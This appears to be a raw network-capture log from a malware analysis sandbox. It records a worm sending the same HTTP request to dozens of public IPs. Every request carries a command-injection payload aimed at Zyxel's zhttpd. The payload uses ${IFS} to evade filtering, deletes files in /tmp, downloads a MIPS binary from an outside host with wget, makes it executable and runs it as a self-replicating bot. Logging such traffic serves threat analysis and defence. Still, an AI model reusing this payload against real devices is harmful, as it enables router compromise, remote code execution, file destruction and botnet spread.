                              Mar 31, 2024 08:41:13.645311117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2354192.168.2.133881427.87.126.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645359993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2355192.168.2.135537083.65.66.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645380020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2356192.168.2.134786435.179.183.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645415068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2357192.168.2.1347484152.31.249.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645468950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2358192.168.2.1360790169.85.139.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645519972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2359192.168.2.1346936206.155.7.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645555019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2360192.168.2.1344582210.49.78.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645610094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2361192.168.2.1340520133.206.99.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645658016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2362192.168.2.1340462197.193.73.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645697117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2363192.168.2.1347968156.88.89.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645757914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2364192.168.2.135575062.149.159.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645787001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2365192.168.2.133886048.47.194.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645817995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2366192.168.2.133388475.223.176.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645885944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2367192.168.2.1335788111.121.31.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645927906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2368192.168.2.1357438121.236.137.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645976067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2369192.168.2.1360234119.179.230.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645999908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2370192.168.2.1348720173.155.150.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.646070957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2371192.168.2.1337868140.175.51.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.655463934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2372192.168.2.133312085.24.235.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.655610085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2373192.168.2.1339670207.83.139.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.655670881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2374192.168.2.1337052205.75.214.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.655723095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2375192.168.2.1342738204.80.4.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.655777931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2376192.168.2.1335192208.57.198.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.655827045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2377192.168.2.1341762174.161.0.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.655864954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2378192.168.2.134382242.219.98.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.655936956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2379192.168.2.1340474220.112.1.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.655986071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2380192.168.2.133559042.164.151.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656032085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2381192.168.2.1344088183.65.105.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656089067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2382192.168.2.1334620201.245.253.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656120062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2383192.168.2.133727842.184.132.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656179905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2384192.168.2.133303891.232.110.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656238079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2385192.168.2.1333736171.162.187.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656286001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2386192.168.2.13502384.137.239.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656341076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2387192.168.2.1348336107.61.210.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656362057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2388192.168.2.1350232175.75.195.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656421900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2389192.168.2.134719436.185.93.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656450033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2390192.168.2.134021669.70.238.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656497955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2391192.168.2.1358664152.205.176.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656573057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2392192.168.2.1351018162.126.64.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656611919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2393192.168.2.133885458.216.103.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656663895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2394192.168.2.1333812205.16.60.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656713009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2395192.168.2.134752014.246.111.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656783104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2396192.168.2.135675085.117.13.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656840086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2397192.168.2.135689081.123.240.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656899929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2398192.168.2.135745247.186.176.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656935930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2399192.168.2.1348656223.204.232.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.656986952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2400192.168.2.1333294194.140.94.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657026052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2401192.168.2.1351436159.208.99.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657078981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2402192.168.2.1354852122.191.39.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657118082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2403192.168.2.1359554121.81.49.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657181978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2404192.168.2.133774627.157.100.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657244921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2405192.168.2.1339864206.23.137.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657310963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2406192.168.2.1352092174.1.107.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657330990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2407192.168.2.1333652194.14.22.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657416105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2408192.168.2.1337926181.99.190.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657452106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2409192.168.2.1345040118.81.196.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657512903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2410192.168.2.1340576114.187.148.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657562017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2411192.168.2.135681270.67.195.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657608986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2412192.168.2.1357568216.139.231.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657649994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2413192.168.2.1348484148.77.195.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657675982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2414192.168.2.1333886138.0.113.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657738924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2415192.168.2.1354188107.240.81.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657764912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2416192.168.2.1360834187.6.165.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657823086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2417192.168.2.13382025.22.180.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657861948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2418192.168.2.1336612113.196.178.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657912016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2419192.168.2.1339306221.179.252.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.657951117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2420192.168.2.134148086.120.54.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658004045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2421192.168.2.134484271.42.136.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.658041000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2422192.168.2.1340002138.199.128.12443
                              TimestampBytes transferredDirectionData
